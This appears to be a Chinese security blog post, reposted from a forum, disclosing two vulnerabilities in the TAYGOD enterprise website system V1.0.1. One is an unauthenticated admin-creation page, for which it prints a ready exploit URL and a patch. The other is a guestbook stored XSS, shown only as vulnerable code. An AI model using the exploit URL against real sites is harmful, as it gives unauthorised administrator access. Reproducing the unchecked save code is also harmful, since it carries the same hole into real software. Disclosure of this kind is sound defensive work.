我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息TAYGOD免费企业建站系统V1.0.1 添加管理员及留言本XSS漏洞
TAYGOD免费企业建站系统V1.0.1 添加管理员及留言本XSS漏洞
3403
0推荐
0评论

影响版本:TAYGOD免费企业建站系统V1.0.1

源码下载地址:http://www.mycodes.net/25/5242.htm

①无验证添加管理员

漏洞文件:Admin_Add.asp

漏洞代码:

    <%if request.QueryString("action")="save"thenuid=replace(trim(Request("uid")),"'","")realname=replace(trim(Request("realname")),"'","")pwd1=replace(trim(Request("pwd1")),"'","")pwd2=replace(trim(Request("pwd2")),"'","")password=md5(pwd1)

原因:未进行验证直接写入数据

利用方案:构造URL

http://localhost/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456

这样就能添加进去一个帐号为test,密码为123456的管理员用户

修补方案:加入判断代码

    if session("admin")=""thenresponse.Write""response.Endendif

②留言本XSS漏洞

漏洞文件:Message.asp

漏洞代码:

    if request.QueryString("action")="save"thenusername=trim(request("username"))email=trim(request("email"))tel=trim(request("tel"))zhiwu=trim(request("zhiwu"))city=trim(request("city"))qq=trim(request("qq"))add=trim(request("add"))title=trim(request("title"))content=trim(request("content"))messageip=Request.ServerVariables("REMOTE_ADDR")set rs=server.CreateObject("adodb.recordset")rs.open "select * from TAY_message",conn,1,3

原因:未过滤,后台照样能够执行

转自:http://www.90sec.org/viewthread.php?tid=3091&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415